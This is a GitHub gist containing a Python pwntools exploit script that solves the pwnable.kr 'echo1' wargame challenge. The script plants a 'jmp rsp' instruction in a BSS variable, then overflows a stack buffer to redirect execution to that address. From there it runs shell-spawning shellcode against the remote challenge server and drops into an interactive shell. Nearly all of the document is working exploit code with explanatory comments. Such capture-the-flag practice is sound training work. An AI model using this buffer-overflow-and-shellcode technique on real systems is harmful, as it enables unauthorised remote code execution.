Created
March 9, 2021 23:56
-
-
Save Pascal-0x90/1724c77a7598a93a848b12f59bfbc393 to your computer and use it in GitHub Desktop.
Pwnable.kr Solves: echo1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
################################### | |
# Std imports | |
import sys | |
# Third party Imports | |
from pwn import * | |
# Binary | |
BINARY = sys.argv[1] | |
# Pwntools Binary info | |
context(os='linux', arch='amd64') | |
r = ROP(BINARY) | |
e = ELF(BINARY) | |
l = e.libc | |
# Connections and interactions | |
#p = process(BINARY) | |
p = remote("pwnable.kr", 9010) | |
# GDB anyone? | |
#gdb.attach(p) | |
#input("Ready to roll?") | |
################################### | |
# Junk to fill up buffer | |
JUNK = b"i"*40 | |
''' | |
Main idea: | |
- Since NX is off, we want to try to execute shellcode | |
- Literally no jmp exists | |
- Furthermore, I dont want to do complex ropping | |
- We can write to: | |
- id (in bss) | |
- s (on stack) | |
- o (maybe?? it in heap though) | |
- We may be able to overwrite some location we know with: | |
- Address | |
- Assembly | |
- Problem is if it is executable or not. | |
''' | |
# Address of id. Is in BSS | |
ID = 0x6020A0 | |
# What do we want to put there? #OverwriteTheBSS | |
jrsp = "jmp rsp" | |
jmp_rsp = asm(jrsp) | |
# What shellcode do we want to execute | |
sc = shellcraft.sh() # Yeah we are kinda basic here | |
''' | |
Flow: | |
1. Overwrite ret with address of jmp instruction | |
2. jump to shellcode | |
3. interact with new bash shell! | |
buffer + addy + shellcode | |
''' | |
# Create our payload | |
pay = JUNK | |
pay += p64(ID) # p64 since this is a 64 bit binary | |
pay += asm(sc) # Our shellcode to execute once jumping back to stack | |
# Check our length of payload | |
log.info(f"Payload Length: {len(pay)}") | |
''' | |
In order to set the id as contents of assembly, | |
we will send it in as the first thing asked for | |
in the program's execution. | |
''' | |
# Recv till ready to read | |
p.clean() | |
''' | |
Important thing to remember here, sometimes what func | |
we use to send intput (ie, sendline vs send) may matter | |
since that extra space or newline does account for our | |
input. Since this case we are telling the program to jump | |
to this location, even if there is some arbitrary value | |
after the assembly, the jump gets taken first so it's | |
negligible in this instance. | |
''' | |
# Send in our asm | |
p.writeline(jmp_rsp.ljust(6,b"\0")) | |
# Now send our option of "echo" type | |
p.sendline("1") | |
# Send in our actual payload | |
p.sendline(pay) | |
# Should have a shell now, do interactive to check | |
p.interactive() | |
p.clean() | |
''' | |
p.sendline("cat echo1") | |
data = p.recvall(timeout=2) | |
print(data) | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment